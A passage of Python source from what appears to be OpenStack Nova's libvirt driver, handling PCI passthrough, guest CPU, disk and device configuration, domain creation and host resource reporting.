disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
# kvm , qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt_type not in ('xen'):
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
# Note(yjiang5): A reset of one PCI device may impact other
# devices on the same bus, thus we need two separated loops
# to detach and then reset it.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
# for libvirt version < 1.1.1, this is race condition
# so forbid detach if not had this version
if not self.has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self.get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
for hdev in [d for d in guest_config.devices
if d.type == 'pci']:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
raise exception.PciDeviceDetachFailed(reason=
"timeout",
dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self.get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_('Attaching PCI devices %(dev)s to %(dom)s failed.')
% {'dev': pci_devs, 'dom': dom.ID()})
raise
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
status_name = {True: 'Enabled',
False: 'Disabled'}
if isinstance(enabled, bool):
disable_service = not enabled
disable_reason = ''
else:
disable_service = bool(enabled)
disable_reason = enabled
ctx = nova_context.get_admin_context()
try:
service = service_obj.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
service.disabled = disable_service
service.disabled_reason = disable_reason
service.save()
LOG.debug(_('Updating compute service status to: %s'),
status_name[disable_service])
except exception.ComputeHostNotFound:
LOG.warn(_('Cannot update service status on host: %s,'
'since it is not registered.') % CONF.host)
except Exception:
LOG.warn(_('Cannot update service status on host: %s,'
'due to an unexpected exception.') % CONF.host,
exc_info=True)
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
self._caps.host.cpu = vconfig.LibvirtConfigCPU()
self._caps.host.cpu.parse_str(features)
except libvirt.VIR_ERR_NO_SUPPORT:
# Note(yjiang5): ignore if libvirt has no support
pass
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match
"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self.get_hypervisor_version())
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
block_device.prepend_dev(disklocal.target_dev)})
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': block_device.prepend_dev(
diskswap.target_dev)})
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
# only kvm support managed mode
if CONF.libvirt_type in ('xen'):
dev.managed = 'no'
if CONF.libvirt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
guest.cpuset = CONF.vcpu_pin_set
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
for key, value in inst_type['extra_specs'].iteritems():
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in quota_items:
setattr(guest, scope[1], value)
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for vif in network_info:
cfg = self.vif_driver.get_config(instance,
vif,
image_meta,
inst_type)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
# Qemu guest agent only support 'qemu' and 'kvm' hypervisor
if CONF.libvirt_type in ('qemu', 'kvm'):
qga_enabled = False
# Enable qga only if the 'hw_qemu_guest_agent' property is set
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_qemu_guest_agent')
is not None):
hw_qga = image_meta['properties']['hw_qemu_guest_agent']
if hw_qga.lower() == 'yes':
LOG.debug(_("Qemu guest agent is enabled through image "
"metadata"), instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if CONF.libvirt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self.get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt_type)
return guest
def to_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
# We should get image metadata every time for generating xml
if image_meta is None:
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
image_meta = compute_utils.get_image_metadata(
context, image_service, image_id, instance)
LOG.debug(_('Start to_xml instance=%(instance)s '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s'
'block_device_info=%(block_device_info)s'),
{'instance': instance, 'network_info': network_info,
'disk_info': disk_info, 'image_meta': image_meta,
'rescue': rescue, 'block_device_info': block_device_info})
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s'),
{'instance': instance, 'xml': xml})
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
container_root_device = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
#Note(GuanQiang): save container root device name here, used for
# detaching the linked image device when deleting
# the lxc instance.
if container_root_device:
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': container_root_device})
if xml:
try:
domain = self._conn.defineXML(xml)
except Exception as e:
LOG.error(_("An error occurred while trying to define a domain"
" with xml: %s") % xml)
raise e
if power_on:
try:
domain.createWithFlags(launch_flags)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while trying to launch a "
"defined domain with xml: %s") %
domain.XMLDesc(0))
try:
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while enabling hairpin mode on "
"domain with xml: %s") % domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None, power_on=True,
context=None, reboot=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt_type, vol)
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# cache device_path in connection_info -- required by encryptors
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
connection_info['data']['device_path'] = conf.source_path
self.virtapi.block_device_mapping_update(context, vol.id,
{'connection_info': jsonutils.dumps(connection_info)})
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance, power_on=power_on)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._lookup_by_id(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_cpuset_ids(self):
"""
Parsing vcpu_pin_set config.
Returns a list of pcpu ids can be used by instances.
"""
cpuset_ids = set()
cpuset_reject_ids = set()
for rule in CONF.vcpu_pin_set.split(','):
rule = rule.strip()
# Handle multi ','
if len(rule) < 1:
continue
# Note the count limit in the .split() call
range_parts = rule.split('-', 1)
if len(range_parts) > 1:
# So, this was a range; start by converting the parts to ints
try:
start, end = [int(p.strip()) for p in range_parts]
except ValueError:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Make sure it's a valid range
if start > end:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Add available pcpu ids to set
cpuset_ids |= set(range(start, end + 1))
elif rule[0] == '^':
# Not a range, the rule is an exclusion rule; convert to int
try:
cpuset_reject_ids.add(int(rule[1:].strip()))
except ValueError:
raise exception.Invalid(_("Invalid exclusion "
"expression %r") % rule)
else:
# OK, a single PCPU to include; convert to int
try:
cpuset_ids.add(int(rule))
except ValueError:
raise exception.Invalid(_("Invalid inclusion "
"expression %r") % rule)
# Use sets to handle the exclusion rules for us
cpuset_ids -= cpuset_reject_ids
if not cpuset_ids:
raise exception.Invalid(_("No CPUs available after parsing %r") %
CONF.vcpu_pin_set)
# This will convert the set to a sorted list for us
return sorted(cpuset_ids)
def get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = self._get_cpuset_ids()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / unit.Gi
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._lookup_by_id(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
try:
dom_mem = int(self._lookup_by_id(domain_id).info()[2])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s")
% domain_id)
continue
# skip dom0
if domain_id != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'
) % {'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
An assignable PCI device can be a normal PCI device,
a SR-IOV Physical Function (PF), or a SR-IOV Virtual
Function (VF). Only normal PCI devices or SR-IOV VFs
are assignable, while SR-IOV PFs are always owned by
hypervisor.
Please notice that a PCI device with SR-IOV
capability but not enabled is reported as normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
